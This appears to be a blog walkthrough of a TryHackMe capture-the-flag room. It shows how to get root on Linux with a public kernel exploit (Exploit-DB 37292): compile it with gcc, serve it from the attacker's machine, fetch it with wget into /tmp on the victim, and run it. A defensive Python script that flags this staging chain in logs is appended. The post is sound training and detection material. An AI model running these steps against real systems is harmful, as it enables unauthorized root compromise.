Series of CTF machines Walkthrough #5 Linux Privilege Escalation using Kernel Exploit.
Hello Hackers! In the last blog we learnt about the different methods of enumeration, so in this one we are going to exploit a vulnerable kernel version. TryHackMe has an excellent learning path called “Linux Privilege Escalation”, and this room is part of it.
What is the Kernel?
The kernel is the heart of the operating system. It provides the interface between applications and the hardware components of the system, and it is responsible for tasks such as memory management, disk management and task (process) management. Because it runs with the highest privilege on the machine, a bug in the kernel can let an unprivileged user take full control of the system, which is exactly what we are going to exploit here.
We already have the SSH credentials from TryHackMe, so let's use them and log in over SSH from the terminal.
You can see we are logged in to the account with ordinary user privileges, so let's escalate our privileges to root by exploiting the kernel.
First, let's check the kernel version using the “uname -a” command. Now that we have the kernel version number, let's search for exploits for it in Searchsploit, Exploit-DB or Google.
This is the link for the kernel exploit: https://www.exploit-db.com/exploits/37292. Download the exploit and compile it using “gcc”.
The command to compile the “37292.c” file is “gcc 37292.c -o priv”.
-o names the output file.
If you open the file with nano or any other editor you can see, at the top, the commands needed to build and run the exploit, and further down you can read how the code works; the exploit is written in C.
After compiling and analysing the exploit, it is time to execute it.
We have to transfer the file to the victim machine. To do that, start a local HTTP server on our (attacker) machine with the simple command “python3 -m http.server”, then use the “wget” command on the victim machine to download the file: “wget http://192.168.1.7:8000/priv”.
Before downloading the exploit on the victim machine, make sure you are in a writable folder such as /tmp.
After downloading the exploit, give it execute permission using “chmod +x priv” and then run it with “./priv”. In the image below you can see that after executing it we got root privileges.
Now change to the root user's home directory, find the file and submit it.
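From the defender's side, the transfer-and-run steps above leave a very recognisable trace: a download into a world-writable directory, a chmod +x there, and an execution from that directory. The following Python script is an added example (not part of the walkthrough) that flags exactly that chain in process-execution log lines; the one-line log format and the sample lines are constructed for the example, not a real auditd format.

```python
"""Flag the staging chain (download into /tmp, chmod +x, run from /tmp) in
process-execution log lines.  The "<ts> uid=<n> cwd=<dir> cmd=<argv>" format
below is constructed for this example, not a real audit log format."""
import os
import re
import shlex
from urllib.parse import urlparse

WRITABLE_DIRS = ("/tmp", "/var/tmp", "/dev/shm")
LINE_RE = re.compile(r"^(?P<ts>\S+) uid=(?P<uid>\d+) cwd=(?P<cwd>\S+) cmd=(?P<cmd>.+)$")

# Constructed sample mirroring the walkthrough's commands (HTTP server on port 8000).
SAMPLE_LOG = """\
2024-01-01T10:00:01 uid=1000 cwd=/home/user cmd=uname -a
2024-01-01T10:00:05 uid=1000 cwd=/tmp cmd=wget http://192.168.1.7:8000/priv
2024-01-01T10:00:09 uid=1000 cwd=/tmp cmd=chmod +x priv
2024-01-01T10:00:12 uid=1000 cwd=/tmp cmd=./priv
2024-01-01T10:00:20 uid=1000 cwd=/home/user cmd=ls -la
"""

def parse_line(line):
    """Return a dict for one log line, or None if it does not match the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ev = m.groupdict()
    ev["argv"] = shlex.split(ev["cmd"])
    return ev

def in_writable_dir(path):
    return any(path == d or path.startswith(d + "/") for d in WRITABLE_DIRS)

def detect_staging(lines):
    """Return one finding per file that was downloaded into a world-writable
    directory, made executable there, and then executed from it."""
    downloaded, executable, findings = set(), set(), []
    for ev in filter(None, map(parse_line, lines)):
        argv = ev["argv"]
        if not argv or not in_writable_dir(ev["cwd"]):
            continue
        tool = argv[0]
        if tool in ("wget", "curl"):  # step 1: fetch (assumes no -O rename)
            for url in (a for a in argv[1:] if a.startswith("http")):
                downloaded.add(os.path.basename(urlparse(url).path))
        elif tool == "chmod" and len(argv) >= 3 and "x" in argv[1]:  # step 2: chmod +x
            target = os.path.basename(argv[2])
            if target in downloaded:
                executable.add(target)
        elif tool.startswith("./") and os.path.basename(tool) in executable:  # step 3: run
            findings.append({"ts": ev["ts"], "uid": ev["uid"],
                             "cwd": ev["cwd"], "file": os.path.basename(tool)})
    return findings

if __name__ == "__main__":
    for f in detect_staging(SAMPLE_LOG.splitlines()):
        print(f"uid {f['uid']} staged and ran {f['cwd']}/{f['file']} at {f['ts']}")
```

The same three-step correlation can be fed from real auditd execve records once the parser is swapped; mounting /tmp with noexec removes the third step entirely.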
Next write-up will be on “SUDO”.